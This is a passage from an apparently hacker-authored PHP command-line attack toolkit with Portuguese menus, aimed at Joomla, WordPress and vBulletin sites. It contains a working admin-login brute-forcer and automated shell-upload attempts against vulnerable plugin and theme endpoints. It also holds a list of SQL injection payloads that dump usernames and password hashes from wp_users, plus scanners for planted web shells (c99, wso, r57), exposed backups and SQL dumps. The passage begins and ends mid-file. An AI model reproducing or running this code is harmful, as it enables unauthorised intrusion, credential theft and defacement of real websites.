  718. @curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  719. $get = curl_exec($curl);
  720. preg_match('/<input type="hidden" name="(.*?)" value="1"/', $get, $token);
  721. return $token[1];
  722. }
  723. $hash = token($sitejmi);
  724. function brute($sitejmi,$usjm,$password,$hash)
  725. {
  726. $curl = curl_init();
  727. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  728. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  729. curl_setopt($curl,CURLOPT_URL, $sitejmi);
  730. curl_setopt($curl,CURLOPT_POSTFIELDS,"username={$usjm}&passwd={$password}&lang=&option=com_login&task=login&return=aW5kZXgucGhw&{$hash}=1");
  731. @curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  732. @curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  733. $brute = curl_exec($curl);
  734. if(eregi("Logout" , $brute))
  735. {
  736. echo " HI tut I found some password for you lol : \n
  737. **************************
  738. * username:{$usjm}\n
  739. * Password : {$password}\n
  740. ***************************
  741. ";
  742. }
  743. return $brute;
  744. }
  745. foreach($passwords as $password)
  746. {
  747. brute($sitejmi,$usjm,$password,$hash);
  748. }
  749. @system("del cookie.txt");
  750. @system("rm cookie.txt");
  751.  
  752.  
  753. }
  754.  
  755. if($id == 2){
  756. echo"
  757. __ ___ __ ___ ____ ____ __
  758. \ \ /\ / / '_ \ / __| / ___| /\ | __ \
  759. \ V V /| |_) | \__ \ ||___ /__\ | | | |
  760. \_/\_/ | .__/ |___/ \____|/----\|_| |_|
  761.  
  762. [1] SCANNER UPLOAD SHELL MULTIP BUGS :
  763. [2] SCANNER SQL INJECTIO USANDO MULTIP BUGS:
  764. [3] SCANNER PATH DISCLOSURE USANDO MULTIP ERROR:
  765. [4] SCANNER PLUGINS :
  766. ";
  767. echo"\n\n Selecione A Opcao == >";
  768. $wpid = trim(fgets(STDIN,1024));
  769. echo"\n";
  770.  
  771. }
  772.  
  773. if($wpid == 4){
  774. echo"
  775. **============================**
  776. ||============================||
  777. || WORDPRESS PLUGINS ||
  778. **============================**
  779. Site Alvo:
  780. ========>";$nanwp =trim(fgets(STDIN,1024));
  781. $sourcewp = @file_get_contents($nanwp);
  782. preg_match_all("#/plugins/(.*?)/#i", $source, $f19);
  783. $plugins=array_unique($f19[1]);
  784. if(count($plugins)==0){ echo "not found";}
  785. foreach($plugins as $plugin){
  786. echo "
  787. ************************
  788. Plugin : $plugin\n
  789. ************************
  790. ";
  791. }
  792.  
  793.  
  794.  
  795.  
  796.  
  797.  
  798.  
  799.  
  800.  
  801.  
  802. }
  803. if($wpid == 1) {
  804. echo"Entre Com Seu Site http://\n";
  805. echo"=====>";
  806. $id1wp =trim(fgets(STDIN,1024));
  807. echo"Escaneando Para Upload Da Shell ......\n";
  808.  
  809.  
  810. $wppath=array(
  811. "/wp-content/plugins/lazy-seo/lazyseo.php",
  812. "/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php",
  813. "/wp-content/plugins/wpmarketplace/uploadify/uploadify.php",
  814. "/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
  815. "/wp-content/plugins/kish-guest-posting/uploadify/scripts/uploadify.php",
  816. "/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php",
  817. "/wp-content/plugins/pica-photo-gallery/picaPhotosResize.php",
  818. "/wp-content/plugins/mac-dock-gallery/upload-file.php",
  819. "/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php",
  820. "/wp-content/plugins/custom-content-type-manager/upload_form.php",
  821. "/wp-content/plugins/front-file-manager/upload.php",
  822. "/wp-content/plugins/rbxgallery/uploader.php",
  823. "/wp-content/plugins/wpstorecart/php/upload.php",
  824. "/wp-content/plugins/omni-secure-files/plupload/examples/upload.php",
  825. "/wp-content/plugins/front-end-upload/upload.php",
  826. "/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php",
  827. "/wp-content/plugins/font-uploader/font-upload.php",
  828. "/wp-content/plugins/foxypress/uploadify/uploadify.php",
  829. "/wp-content/plugins/html5avmanager/lib/uploadify/custom.php",
  830. "/wp-content/plugins/asset-manager/upload.php",
  831. "/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
  832. "/wp-content/uploads/rsjp/attachments/",
  833. "/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php",
  834. "/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php",
  835. "/wp-content/plugins/user-meta/framework/helper/uploader.php",
  836. "/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php",
  837. "/wp-content/plugins/grapefile/grapeupload.php",
  838. "/wp-content/plugins/grapefile/grapeupload3.php",
  839. "/wp-content/plugins/grapefile/grapeupload2.php",
  840. "/wp-content/plugins/grapefile/grapeupload4.php",
  841. "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
  842. "/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html",
  843. "/wp-admin/includes/heaber.php",
  844. "/wp-content/plugins/complete-gallery-manager/frames/upload-images.php"
  845.  
  846. );
  847. foreach($wppath as $patwp) {
  848. $lawp ="$id1wp$patwp";
  849. $wpnon =get_headers($lawp);
  850. $wppreg =preg_match("/OK/",$wpnon[0]);
  851. if($wppreg){
  852. echo"\nEncontrado ===>$lawp\n ";
  853. }
  854. }
  855.  
  856.  
  857. $a1zaz2azaw5a6 = curl_init("$id1wp/wp-content/themes/Bloggie/themify/themify-ajax.php?upload=1");
  858. curl_setopt($a1zaz2azaw5a6, CURLOPT_POST, true);
  859. curl_setopt($a1zaz2azaw5a6, CURLOPT_POSTFIELDS,
  860. array('Filedata'=>"@$uploadfile"));
  861. curl_setopt($a1zaz2azaw5a6, CURLOPT_RETURNTRANSFER, 1);
  862. $postResult = curl_exec($a1zaz2azaw5a6);
  863. curl_close($a1zaz2azaw5a6);
  864. $aszjdhozahod=file_get_contents("$id1wp//wp-content/themes/Bloggie/uploads/upload.php");
  865. if($aszjdhozahod){
  866. echo"$id1wp/wp-content/themes/Bloggie/uploads/upload.php";
  867. }
  868.  
  869. $a1zaz2azaw5a6sqdqsdqsdqsd = curl_init("$id1wp/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1");
  870. curl_setopt($a1zaz2azaw5a6sqdqsdqsdqsd, CURLOPT_POST, true);
  871. curl_setopt($a1zaz2azaw5a6sqdqsdqsdqsd, CURLOPT_POSTFIELDS,
  872. array('Filedata'=>"@$uploadfile"));
  873. curl_setopt($a1zaz2azaw5a6sqdqsdqsdqsd, CURLOPT_RETURNTRANSFER, 1);
  874. $postResult = curl_exec($a1zaz2azaw5a6sqdqsdqsdqsd);
  875. curl_close($a1zaz2azaw5a6sqdqsdqsdqsd);
  876. $ezfze=file_get_contents("$id1wp/wp-content/themes/pinboard/uploads/upload.php");
  877. if($ezfze){
  878. echo"$id1wp/wp-content/themes/pinboard/uploads/upload.php";
  879.  
  880. }
  881.  
  882. $hamzasec = curl_init("$id1wp/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1");
  883. curl_setopt($hamzasec, CURLOPT_POST, true);
  884. curl_setopt($hamzasec, CURLOPT_POSTFIELDS,
  885. array('Filedata'=>"@$uploadfile"));
  886. curl_setopt($hamzasec, CURLOPT_RETURNTRANSFER, 1);
  887. $postResult = curl_exec($hamzasec);
  888. curl_close($hamzasec);
  889. $yuyy=@file_get_contents("$id1wp//wp-content/themes/blogfolio/uploads/");
  890. if($yuyy){
  891.  
  892. echo"$id1wp//wp-content/themes/blogfolio/uploads/upload.php";
  893.  
  894. }
  895.  
  896.  
  897. ///////////////////////////////////////////////////////////////////
  898. $lamapazlazmlqclmdpg = curl_init("$id1wp/wp-content/plugins/page-flip-image-gallery/upload.php");
  899. curl_setopt($lamapazlazmlqclmdpg, CURLOPT_POST, true);
  900. curl_setopt($lamapazlazmlqclmdpg, CURLOPT_POSTFIELDS,
  901. array('orange_themes'=>"@$uploadfile")); curl_setopt($lamapazlazmlqclmdpg,
  902. CURLOPT_RETURNTRANSFER, 1);
  903. $postResult = curl_exec($lamapazlazmlqclmdpg);
  904. url_close($lamapazlazmlqclmdpg);
  905. $lalalal=@file_get_contents("$id1wp/wp-content/uploads/upload.php");
  906. if($lalalal){
  907. echo"$id1wp/wp-content/uploads/upload.php";
  908. }
  909.  
  910.  
  911. }
  912. if($wpid == 2) {
  913. echo"Entre Com Seu Site http://\n";
  914. echo"=====>";
  915. $wpsql =trim(fgets(STDIN,1024));
  916. echo"Escaneando Por SQL ......\n";
  917.  
  918.  
  919. $sqlwp12=array("index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
  920. "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
  921. "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
  922. "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
  923. "wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
  924. "wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--",
  925. "wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
  926. "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
  927. "wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
  928. "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  929. "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
  930. "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  931. "index?page_id=2&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
  932. "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
  933. "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
  934. "wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  935. "myLDlinker.php?url=-2/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  936. "?page_id=2/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2",
  937. "wp-content/themes/limon/cplphoto.php?postid=-2+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2",
  938. "?event_id=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  939. "wp-content/plugins/photoracer/viewimg.php?id=-99999+union+select+0,1,2,3,4,user(),6,7,8/*",
  940. "?page_id=2&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users/*",
  941. "wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*",
  942. "mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--",
  943. "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",
  944. "wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
  945. "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*");
  946. foreach($sqlwp12 as $wpsaql12){
  947. $wppasq="$wpsql/$wpsaql12";
  948. $wppreg=get_headers($wppasq);
  949. $nawp=preg_match("/OK/",$wppreg[0]);
  950. if($nawp){
  951.  
  952. echo"\nEncontrado ======>\n $wppasq";
  953. }
  954.  
  955. }
  956.  
  957. }
  958.  
  959. if($wpid == 3) {
  960. echo"Entre Com Seu Site http://\n";
  961. echo"=====>";
  962. $wpdsl =trim(fgets(STDIN,1024));
  963. echo"Escaneando Path Disclosure ......\n";
  964. $wpwpwp=array("/wp-settings.php",
  965. "/wp-includes/admin-bar.php",
  966. "/wp-includes/author-template.php",
  967. "/wp-includes/canonical.php",
  968. "/wp-includes/category-template.php",
  969. "/wp-includes/class-wp-embed.php",
  970. "/wp-includes/media.php",
  971. "/wp-includes/ms-default-constants.php",
  972. "/wp-includes/ms-default-filters.php",
  973. "/wp-includes/ms-settings.php",
  974. "/wp-includes/post.php",
  975. "/wp-includes/rss.php",
  976. "/wp-includes/user.php",
  977. "/wp-includes/theme.php",
  978. "/wp-includes/vars.php",
  979. "/wp-includes/class-wp-http-ixr-client.php",
  980. "/wp-includes/class-wp-image-editor-gd.php",
  981. "/wp-includes/class-wp-image-editor-imagick.php",
  982. "/wp-includes/class-wp-xmlrpc-server.php",
  983. "/wp-includes/class-wp-xmlrpc-server.php",
  984. "/wp-includes/class-wp-xmlrpc-server.php",
  985. "/wp-includes/class.wp-scripts.php",
  986. "/wp-includes/class.wp-styles.php",
  987. "/wp-includes/comment-template.php",
  988. "/wp-includes/default-filters.php",
  989. "/wp-includes/default-widgets.php",
  990. "/wp-includes/feed-atom-comments.php",
  991. "/wp-includes/feed-atom.php",
  992. "/wp-includes/feed-rdf.php",
  993. "/wp-includes/feed-rss.php",
  994. "/wp-includes/feed-rss2-comments.php",
  995. "/wp-includes/feed-rss2.php",
  996. "/wp-includes/functions.php");
  997. foreach($wpwpwp as $dzhacker){
  998. $allwp="$wpdsl$dzhacker";
  999. $zebi=get_headers($allwp);
  1000. $nemi=preg_match("/OK/",$zebi[0]);
  1001. if($nemi){
  1002. echo "\n Encontrado ==>\n$allwp";
  1003.  
  1004. }
  1005.  
  1006.  
  1007. }
  1008.  
  1009. }
  1010. if($id == 3 ){
  1011.  
  1012. echo"
  1013. ***********************************************
  1014. ,--^----------,--------,-----,-------^--, *
  1015. | ||||||||| `--------' | O *
  1016. `+---------------------------^----------| *
  1017. `\_,-------, _________________________| *
  1018. / XXXXXX /`| / *
  1019. / XXXXXX / `\ / *
  1020. / XXXXXX /\______( *
  1021. / XXXXXX / *
  1022. / XXXXXX / *
  1023. (________( *
  1024. `------' *
  1025. ***********************************************
  1026. ** **
  1027. ** SQl,Backup,Xss,Upload Path,Shell **
  1028. ** **
  1029. ***********************************************
  1030. Comando http://
  1031. ***********************************************
  1032. Entre Com Seu Site ====>";
  1033. $gnsc =trim(fgets(STDIN,1024));
  1034. $dangpath=array(
  1035. "/wso.php",
  1036. "/c99.php",
  1037. "/upload.php",
  1038. "/upload/upload.php",
  1039. "/uploads/c99.php",
  1040. "/uploads/wso.php",
  1041. "/includes/api/commonwhitelist_2.php",
  1042. "/includes/api/commonwhitelist_5.php",
  1043. "/includes/api/commonwhitelist_6.php",
  1044. "/includes/api/1/album_album.php",
  1045. "/includes/api/1/album_editalbum.php",
  1046. "/includes/api/1/album_latest.php",
  1047. "/includes/api/1/album_overview.php",
  1048. "/includes/api/1/album_picture.php",
  1049. "/includes/api/1/album_user.php",
  1050. "/includes/api/1/announcement_edit.php",
  1051. "/includes/api/1/announcement_view.php",
  1052. "/includes/api/1/api_cmscategorylist.php",
  1053. "/includes/api/1/api_cmssectionlist.php",
  1054. "/includes/api/1/api_forumlist.php",
  1055. "/includes/api/1/api_getnewtop.php",
  1056. "/includes/api/1/api_getsecuritytoken.php",
  1057. "/includes/api/1/api_getsessionhash.php",
  1058. "/includes/api/1/api_init.php",
  1059. "/includes/api/1/api_mobilepublisher.php",
  1060. "/includes/api/1/api_usersearch.php",
  1061. "/includes/api/1/blog_blog.php",
  1062. "/includes/api/1/blog_bloglist.php",
  1063. "/includes/api/1/blog_comments.php",
  1064. "/includes/api/1/blog_custompage.php",
  1065. "/includes/api/1/blog_dosendtofriend.php",
  1066. "/includes/api/1/blog_list.php",
  1067. "/includes/api/1/blog_members.php",
  1068. "/includes/api/1/blog_post_comment.php",
  1069. "/includes/api/1/blog_post_editblog.php",
  1070. "/includes/api/1/blog_post_editcomment.php",
  1071. "/includes/api/1/blog_post_edittrackback.php",
  1072. "/includes/api/1/blog_post_newblog.php",
  1073. "/includes/api/1/blog_post_postcomment.php",
  1074. "/includes/api/1/blog_post_updateblog.php",
  1075. "/includes/api/1/blog_sendtofriend.php",
  1076. "/includes/api/1/blog_subscription_entrylist.php",
  1077. "/includes/api/1/blog_subscription_userlist.php",
  1078. "/includes/api/1/blog_usercp_addcat.php",
  1079. "/includes/api/1/blog_usercp_editcat.php",
  1080. "/includes/api/1/blog_usercp_editoptions.php",
  1081. "/includes/api/1/blog_usercp_editprofile.php",
  1082. "/includes/api/1/blog_usercp_modifycat.php",
  1083. "/includes/api/1/blog_usercp_updateprofile.php",
  1084. "/includes/api/1/editpost_editpost.php",
  1085. "/includes/api/1/editpost_updatepost.php",
  1086. "/includes/api/1/forum.php",
  1087. "/includes/api/1/forumdisplay.php",
  1088. "/includes/api/1/inlinemod_domergeposts.php",
  1089. "/includes/api/1/list.php",
  1090. "/includes/api/1/login_lostpw.php",
  1091. "/includes/api/1/member.php",
  1092. "/includes/api/1/memberlist_search.php",
  1093. "/includes/api/1/misc_showattachments.php",
  1094. "/includes/api/1/misc_whoposted.php",
  1095. "/includes/api/1/newreply_newreply.php",
  1096. "/includes/api/1/newreply_postreply.php",
  1097. "/includes/api/1/newthread_postthread.php",
  1098. "/includes/api/1/newthread_newthread.php",
  1099. "/includes/api/1/poll_newpoll.php",
  1100. "/includes/api/1/poll_polledit.php",
  1101. "/includes/api/1/poll_showresults.php",
  1102. "/includes/api/1/private_editfolders.php",
  1103. "/includes/api/1/private_insertpm.php",
  1104. "/includes/api/1/private_messagelist.php",
  1105. "/includes/api/1/private_newpm.php",
  1106. "/includes/api/1/private_showpm.php",
  1107. "/includes/api/1/private_trackpm.php",
  1108. "/includes/api/1/profile_editattachments.php",
  1109. "/includes/api/1/profile_editoptions.php",
  1110. "/includes/api/1/profile_editprofile.php",
  1111. "/includes/api/1/register_addmember.php",
  1112. "/includes/api/1/register_checkdate.php",
  1113. "/includes/api/1/search_process.php",
  1114. "/includes/api/1/search_showresults.php",
  1115. "/includes/api/1/showthread.php",
  1116. "/includes/api/1/subscription_addsubscription.php",
  1117. "/includes/api/1/subscription_editfolders.php",
  1118. "/includes/api/1/subscription_viewsubscription.php",
  1119. "/includes/api/1/threadtag_managetags.php",
  1120. "/includes/api/2/album_picture.php",
  1121. "/includes/api/2/api_blogcategorylist.php",
  1122. "/includes/api/2/blog_blog.php",
  1123. "/includes/api/2/blog_bloglist.php",
  1124. "/includes/api/2/blog_list.php",
  1125. "/includes/api/2/blog_subscription_entrylist.php",
  1126. "/includes/api/2/blog_subscription_userlist.php",
  1127. "/includes/api/2/blog_usercp_groups.php",
  1128. "/includes/api/2/content.php",
  1129. "/includes/api/2/editpost_editpost.php",
  1130. "/includes/api/2/forumdisplay.php",
  1131. "/includes/api/2/member.php",
  1132. "/includes/api/2/newreply_newreply.php",
  1133. "/includes/api/2/forum.php",
  1134. "/includes/api/2/poll_newpoll.php",
  1135. "/includes/api/2/poll_polledit.php",
  1136. "/includes/api/2/poll_showresults.php",
  1137. "/includes/api/2/private_messagelist.php",
  1138. "/includes/api/2/private_trackpm.php",
  1139. "/includes/api/2/profile_editattachments.php",
  1140. "/includes/api/2/search_showresults.php",
  1141. "/includes/api/2/showthread.php",
  1142. "/includes/api/3/api_gotonewpost.php",
  1143. "/includes/api/4/album_user.php",
  1144. "/includes/api/4/api_forumlist.php",
  1145. "/includes/api/4/api_getnewtop.php",
  1146. "/includes/api/4/breadcrumbs_create.php",
  1147. "/includes/api/4/facebook_getforumid.php",
  1148. "/includes/api/4/facebook_getnewforummembers.php",
  1149. "/includes/api/4/get_vbfromfacebook.php",
  1150. "/includes/api/4/login_facebook.php",
  1151. "/includes/api/4/newreply_postreply.php",
  1152. "/includes/api/4/newthread_postthread.php",
  1153. "/includes/api/4/register.php",
  1154. "/includes/api/4/register_addmember.php",
  1155. "/includes/api/4/search_findusers.php",
  1156. "/includes/api/4/subscription_viewsubscription.php",
  1157. "/includes/api/5/api_init.php",
  1158. "/includes/api/6/api_getnewtop.php",
  1159. "/includes/api/6/api_gotonewpost.php",
  1160. "/includes/api/6/content.php",
  1161. "/includes/api/6/member.php",
  1162. "/includes/api/6/newthread_newthread.php",
  1163. "/includes/block/blogentries.php",
  1164. "/includes/block/cmsarticles.php",
  1165. "/includes/block/html.php",
  1166. "/includes/block/newposts.php",
  1167. "/includes/block/sgdiscussions.php",
  1168. "/includes/block/tagcloud.php",
  1169. "/includes/block/threads.php",
  1170. "/forumrunner/include/subscriptions.php",
  1171. "/forumrunner/include/search_forum.php",
  1172. "/forumrunner/include/profile.php",
  1173. "/forumrunner/include/post.php",
  1174. "/forumrunner/include/pms.php",
  1175. "/forumrunner/include/online.php",
  1176. "/forumrunner/include/moderation.php",
  1177. "/forumrunner/include/misc.php",
  1178. "/forumrunner/include/login.php",
  1179. "/forumrunner/include/get_thread.php",
  1180. "/forumrunner/include/get_forum.php",
  1181. "/forumrunner/include/cms.php",
  1182. "/forumrunner/include/attach.php",
  1183. "/forumrunner/include/announcement.php",
  1184. "/forumrunner/include/album.php",
  1185. "/forumrunner/support/vbulletin_methods.php",
  1186. "/forumrunner/support/stringparser_bbcode.class.php",
  1187. "/forumrunner/support/utils.php",
  1188. "/forumrunner/support/other_methods.php",
  1189. "/packages/skimlinks/hooks/postbit_display_complete.php",
  1190. "/packages/skimlinks/hooks/showthread_complete.php",
  1191. "/packages/skimlinks/hooks/userdata_start.php",
  1192. "/uploads/r57.php",
  1193. "/uploads/0day.php",
  1194. "/images/c99.php",
  1195. "/images/upload.php",
  1196. "/images/wso.php",
  1197. "/images/stories/0day.php",
  1198. "/images/stories/3xp.php",
  1199. "/images/x.php",
  1200. "/images/stories/x.php",
  1201. "/robots.txt",
  1202. "/readme.html",
  1203. "/phpinfo.php",
  1204. "/up.php",
  1205. "/upload.php",
  1206. "/uploads.php",
  1207. "/vb.zip",
  1208. "/vb.rar",
  1209. "/vb.tar",
  1210. "/vb.tar.gz",
  1211. "/site.zip",
  1212. "/site.rar",
  1213. "/site.tar",
  1214. "/site.tar.gz",
  1215. "/home.zip",
  1216. "/home.rar",
  1217. "/home.tar",
  1218. "/home.tar.gz",
  1219. "/forum.zip",
  1220. "/forum.rar",
  1221. "/forum.tar",
  1222. "/forum.tar.gz",
  1223. "/test.txt",
  1224. "/ftp.txt",
  1225. "/user.txt",
  1226. "/site.txt",
  1227. "/error_log",
  1228. "/error",
  1229. "/cpanel",
  1230. "/awstats",
  1231. "/site.sql",
  1232. "/vb.sql",
  1233. "/forum.sql",
  1234. "/backup.sql",
  1235. "/back.sql",
  1236. "/data.sql",
  1237. "/backup.zip",
  1238. "/backup.tar.gz",
  1239. "/backup-wp.zip",
  1240. "/backup-wp.tar.gz",
  1241. "/wp-backup.zip",
  1242. "/wp-backup.tar.gz",
  1243. "/wp-backup.tar",
  1244. "/backup/backup.zip",
  1245. "/backup/backup.tar",
  1246. "/backup/backup.tar.gz",
  1247. "/general.php?*id=",
  1248. "/careers-detail.asp?id=",
  1249. "/WhatNew.asp?page=",
  1250. "/gallery.asp?cid=",
  1251. "/publications.asp?type=",
  1252. "/mpfn?id=",
  1253. "/reservations.php?id=",
  1254. "/list_blogs.php?sort_mode=",
  1255. "/eventdetails.php?*=",
  1256. "/commodities.php?*id=",
  1257. "/recipe-view.php?id=",
  1258. "/product.php?mid=",
  1259. "/view_ad.php?id=",
  1260. "/imprimir.php?id=",
  1261. "/prodotti.php?id=",
  1262. "/index.cgi?aktion=",
  1263. "/default.php?id=",
  1264. "/default.php?portalID=",
  1265. "/news.php?id=",
  1266. "/articles.php?id=",
  1267. "/os_view_full.php?",
  1268. "/Content.asp?id=",
  1269. "/CollectionContent.asp?id=",
  1270. "/Details.asp?id=",
  1271. "/index.php?pgId=",
  1272. "/index.php?PID=",
  1273. "/dosearch.asp?id=",
  1274. "/details.php?linkid=",
  1275. "/viewfaqs.php?cat=",
  1276. "/calendar.php?token=",
  1277. "/games.php?id=",
  1278. "/gmap.php?id=",
  1279. "/index.php?txtCodiInfo=",
  1280. "/notizia.php?idArt=",
  1281. "/read.php?id=",
  1282. "/ViewerFrame?Mode=",
  1283. "/productinfo.php?id=",
  1284. "/collectionitem.php?id=",
  1285. "/band_info.php?id=",
  1286. "/product.php?id=",
  1287. "/releases.php?id=",
  1288. "/ray.php?id=",
  1289. "/produit.php?id=",
  1290. "/pop.php?id=",
  1291. "/shopping.php?id=",
  1292. "/productdetail.php?id=",
  1293. "/post.php?id=",
  1294. "/viewshowdetail.php?id=",
  1295. "/clubpage.php?id=",
  1296. "/memberInfo.php?id=",
  1297. "/section.php?id=",
  1298. "/theme.php?id=",
  1299. "/page.php?id=",
  1300. "/shredder-categories.php?id=",
  1301. "/tradeCategory.php?id=",
  1302. "/product_ranges_view.php?ID=",
  1303. "/shop_category.php?id=",
  1304. "/transcript.php?id=",
  1305. "/channel_id=",
  1306. "/item_id=",
  1307. "/newsid=",
  1308. "/trainers.php?id=",
  1309. "/news-full.php?id=",
  1310. "/news_display.php?getid=",
  1311. "/index2.php?option=",
  1312. "/readnews.php?id=",
  1313. "/top10.php?cat=",
  1314. "/newsone.php?id=",
  1315. "/event.php?id=",
  1316. "/product-item.php?id=",
  1317. "/sql.php?id=",
  1318. "/aboutbook.php?id=",
  1319. "/preview.php?id=",
  1320. "/loadpsb.php?id=",
  1321. "/pages.php?id=",
  1322. "/material.php?id=",
  1323. "/clanek.php4?id=",
  1324. "/announce.php?id=",
  1325. "/chappies.php?id=",
  1326. "/read.php?id=",
  1327. "/viewapp.php?id=",
  1328. "/viewphoto.php?id=",
  1329. "/rub.php?idr=",
  1330. "/galeri_info.php?l=",
  1331. "/review.php?id=",
  1332. "/iniziativa.php?in=",
  1333. "/curriculum.php?id=",
  1334. "/labels.php?id=",
  1335. "/story.php?id=",
  1336. "/look.php?ID=",
  1337. "/newsone.php?id=",
  1338. "/aboutbook.php?id=",
  1339. "/material.php?id=",
  1340. "/opinions.php?id=",
  1341. "/announce.php?id=",
  1342. "/rub.php?idr=",
  1343. "/galeri_info.php?l=",
  1344. "/tekst.php?idt=",
  1345. "/newscat.php?id=",
  1346. "/newsticker_info.php?idn=",
  1347. "/rubrika.php?idr=",
  1348. "/rubp.php?idr=",
  1349. "/offer.php?idf=",
  1350. "/art.php?idm=",
  1351. "/title.php?id=",
  1352. "/trainers.php?id=",
  1353. "/buy.php?category=",
  1354. "/article.php?ID=",
  1355. "/play_old.php?id=",
  1356. "/declaration_more.php?decl_id=",
  1357. "/Pageid=",
  1358. "/games.php?id=",
  1359. "/page.php?file=",
  1360. "/newsDetail.php?id=",
  1361. "/gallery.php?id=",
  1362. "/article.php?id=",
  1363. "/show.php?id=",
  1364. "/staff_id=",
  1365. "/newsitem.php?num=",
  1366. "/readnews.php?id=",
  1367. "/top10.php?cat=",
  1368. "/historialeer.php?num=",
  1369. "/reagir.php?num=",
  1370. "/forum_bds.php?num=",
  1371. "/game.php?id=",
  1372. "/view_product.php?id=",
  1373. "/newsone.php?id=",
  1374. "/sw_comment.php?id=",
  1375. "/news.php?id=",
  1376. "/avd_start.php?avd=",
  1377. "/event.php?id=",
  1378. "/product-item.php?id=",
  1379. "/sql.php?id=",
  1380. "/news_view.php?id=",
  1381. "/select_biblio.php?id=",
  1382. "/humor.php?id=",
  1383. "/aboutbook.php?id=",
  1384. "/fiche_spectacle.php?id=",
  1385. "/communique_detail.php?id=",
  1386. "/sem.php3?id=",
  1387. "/kategorie.php4?id=",
  1388. "/news.php?id=",
  1389. "/index.php?id=",
  1390. "/faq2.php?id=",
  1391. "/show_an.php?id=",
  1392. "/preview.php?id=",
  1393. "/loadpsb.php?id=",
  1394. "/opinions.php?id=",
  1395. "/spr.php?id=",
  1396. "/pages.php?id=",
  1397. "/announce.php?id=",
  1398. "/clanek.php4?id=",
  1399. "/participant.php?id=",
  1400. "/download.php?id=",
